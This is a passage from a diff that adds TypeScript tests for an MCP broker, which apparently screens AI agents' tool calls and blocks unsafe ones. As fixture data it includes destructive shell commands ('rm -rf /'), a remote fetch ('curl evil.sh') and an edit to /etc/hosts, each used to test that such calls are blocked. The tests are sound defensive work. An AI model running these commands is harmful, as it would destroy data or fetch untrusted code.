evaluateClientLine(line, { evaluate }); + + assert.equal(outcome.forward, true); + assert.equal(called, false); + }); + + it('forwards unparseable lines untouched', async () => { + const outcome = await evaluateClientLine('not json at all', { evaluate: denyEvaluator }); + assert.equal(outcome.forward, true); + assert.equal(outcome.injectToClient, undefined); + }); + + it('forwards a tools/call when the evaluator has no opinion', async () => { + const outcome = await evaluateClientLine(toolCall(7, 'list_files', { path: '/tmp' }), { + evaluate: nullEvaluator, + }); + assert.equal(outcome.forward, true); + }); + + it('blocks a tools/call and synthesizes a JSON-RPC error carrying the request id', async () => { + const outcome = await evaluateClientLine(toolCall(42, 'run_shell', { command: 'rm -rf /' }), { + evaluate: denyEvaluator, + }); + + assert.equal(outcome.forward, false); + assert.ok(outcome.injectToClient); + const parsed = JSON.parse(outcome.injectToClient as string); + assert.equal(parsed.id, 42); + assert.equal(parsed.error.code, -32001); + assert.match(parsed.error.message, /Blocked by AgentGuard/); + assert.equal(parsed.error.data.decision, 'block'); + }); + + it('fails closed on require_approval (non-interactive proxy)', async () => { + const outcome = await evaluateClientLine(toolCall(5, 'run_shell', { command: 'curl evil.sh' }), { + evaluate: async () => protectResult('require_approval'), + }); + assert.equal(outcome.forward, false); + assert.ok(outcome.injectToClient); + }); + + it('maps tool name and arguments into the protectAction raw input shape', () => { + const message = parseJsonRpc(toolCall(1, 'edit_file', { file_path: '/etc/hosts' })); + assert.ok(isToolCall(message)); + const raw = toolCallRawInput(message!, { evaluate: nullEvaluator, sourceSkill: 'demo-skill' }); + assert.equal(raw.tool_name, 'edit_file'); + assert.deepEqual(raw.tool_input, { file_path: '/etc/hosts' }); + assert.equal(raw.sourceSkill, 'demo-skill'); + }); +}); + +describe('MCP broker — line framing', () => { + it('reassembles JSON split across chunk boundaries and splits multiple lines', () => { + const lines: string[] = []; + const buffer = createLineBuffer((line) => lines.push(line)); + buffer.push('{"a":1}\n{"b":'); + buffer.push('2}\n{"c":3}'); + buffer.flush(); + assert.deepEqual(lines, ['{"a":1}', '{"b":2}', '{"c":3}']); + }); +}); + +describe('MCP broker — stdio proxy', () => { + it('forwards allowed tool calls to the child but vetoes blocked ones', async () => { + const childScript = + "const rl=require('readline').createInterface({input:process.stdin});" + + "rl.on('line',l=>process.stdout.write('RECEIVED:'+l+'\\n'));" + + "rl.on('close',()=>process.exit(0));"; + + const evaluate: BrokerEvaluator = async (rawInput) => { + const serialized = JSON.stringify(rawInput.tool_input ?? {}); + return serialized.includes('rm -rf') ? protectResult('block') : null; + }; + + const stdin = new PassThrough(); + const stdout = new PassThrough(); + const stderr = new PassThrough(); + let out = ''; + stdout.on('data', (chunk: Buffer) => { + out += chunk.toString('utf8'); + }); + + const done = runMcpBrokerStdio({ + command: process.execPath, + args: ['-e', childScript], + evaluate, + stdin, + stdout, + stderr, + }); + + stdin.write(`${toolCall(1, 'list_files', { path: '/tmp' })}\n`); + stdin.write(`${toolCall(2, 'run_shell', { command: 'rm -rf /' })}\n`); + stdin.end(); + + await done; + + const receivedLines = out.split('\n').filter((line) => line.startsWith('RECEIVED:')); + assert.equal(receivedLines.length, 1, 'only the allowed call should reach the child'); + assert.match(receivedLines[0], /"id":1/); + assert.doesNotMatch(out, /RECEIVED:.*"id":2/); + + const blockedLine = out.split('\n').find((line) => line.includes('"code":-32001')); + assert.ok(blockedLine, 'a JSON-RPC veto should be returned to the client'); + assert.match(blockedLine as string, /"id":2/); + }); + + it('propagates the downstream non-zero exit code to the caller', async () => { + const stdin = new PassThrough(); + const stdout = new PassThrough(); + const stderr = new PassThrough(); + + const code = await runMcpBrokerStdio({ + command: process.execPath, + args: ['-e', 'process.exit(3)'], + evaluate: async () => null, + stdin, + stdout, + stderr, + }); + + assert.equal(code, 3, 'the child exit code must surface unchanged'); + }); + + it('flushes a synthesized block response before resolving even when the child exits at once', async () => { + // Child exits immediately on its first line; the broker must still emit the + // veto for a blocked call rather than dropping it on early child exit. + const childScript = + "const rl=require('readline').createInterface({input:process.stdin});" + + "rl.on('line',()=>process.exit(0));"; + + const stdin = new PassThrough(); + const stdout = new PassThrough(); + const stderr = new PassThrough(); + let out = ''; + stdout.on('data', (chunk: Buffer) => { + out += chunk.toString('utf8'); + }); + + const done = runMcpBrokerStdio({ + command: process.execPath, + args: ['-e', childScript], + evaluate: async () => protectResult('block'), + stdin, + stdout, + stderr, + }); + + stdin.write(`${toolCall(9, 'run_shell', { command: 'rm -rf /' })}\n`); + stdin.end(); + + await done; + + assert.match(out, /"code":-32001/, 'the veto must reach the client despite quick child exit'); + assert.match(out, /"id":9/); + }); +});